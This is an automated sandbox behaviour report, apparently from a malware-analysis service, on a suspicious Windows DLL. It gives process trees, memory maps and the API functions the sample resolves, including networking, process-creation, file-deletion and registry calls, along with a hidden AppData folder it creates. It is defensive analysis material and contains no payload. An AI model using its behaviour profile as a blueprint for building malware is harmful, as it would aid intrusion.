97328f00d5dc6d72f7a1a5c75e6991135183ffeef10e1a6a49dab7cba2eb7f6c (SHA256)
97328f00d5dc6d72f7a1a5c75e6991135183ffeef10e1a6a49dab7cba2eb7f6c.dll
Windows DLL (x86-32)
Created at 2018-04-29 13:05:00
Notifications (2/2)
This report is associated with a dynamic link library (DLL), which normally needs an appropriate loader. If an appropriate loader was not submitted along with the DLL, the analysis results may be incomplete and may not fully represent the behavior of the sample.
The overall sleep time of all monitored processes was truncated from "3 hours, 58 minutes, 39 seconds" to "40 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: gorctexxzx.exe
0
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fel="c:\users\eebsym5\appdata\local\temp\tmpb1jc7c" /s |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:25, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:04 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa3c |
| Parent PID | 0x608 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A40
0x
A44
0x
A48
0x
A4C
0x
A58
0x
A5C
0x
A68
0x
A74
0x
A88
0x
A98
0x
AA4
0x
AB4
0x
AC0
0x
AD0
0x
ADC
0x
AE8
0x
AF4
0x
B00
0x
B0C
0x
B18
0x
B24
0x
B30
0x
B3C
0x
B48
0x
B54
0x
B60
0x
B6C
0x
B78
0x
B84
0x
B90
0x
B9C
0x
BA8
0x
BB4
0x
BC0
0x
BCC
0x
BD8
0x
BF8
0x
C04
0x
C10
0x
C24
0x
C30
0x
C3C
0x
C50
0x
C5C
0x
C68
0x
C78
0x
C88
0x
C94
0x
CA0
0x
CAC
0x
CB8
0x
CC4
0x
CD0
0x
CDC
0x
CE8
0x
CF4
0x
D00
0x
D0C
0x
D18
0x
D28
0x
D38
0x
D44
0x
D50
0x
D64
0x
D70
0x
D7C
0x
D88
0x
D94
0x
DA0
0x
DAC
0x
DB8
0x
DEC
0x
E88
0x
E94
0x
EA0
0x
EAC
0x
EB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00171fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x00306fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x003f0000 | 0x003f3fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db | 0x00400000 | 0x0041efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x00420fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x00430000 | 0x0045ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x00460000 | 0x00463fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00580fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0118ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001190000 | 0x01190000 | 0x01196fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000011a0000 | 0x011a0000 | 0x011a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000011b0000 | 0x011b0000 | 0x011b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x012defff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001330000 | 0x01330000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01370000 | 0x0163efff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01640000 | 0x016a5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001770000 | 0x01770000 | 0x0186ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000017a0000 | 0x017a0000 | 0x0189ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000018a0000 | 0x018a0000 | 0x01c92fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01edffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x0206ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d30000 | 0x74d6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x74d70000 | 0x74e64fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x75f50000 | 0x75f61fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76170000 | 0x76196fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x77cd0000 | 0x77e6cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Process #2: gorctexxzx.exe
133
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A54
0x
A78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00337fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00630fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0083ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x0079ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0083ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (115)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
16 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
10 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
7 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 4 |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10000 milliseconds (10.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:23 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 93460 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #3: gorctexxzx.exe
156
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa60 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A64
0x
A8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
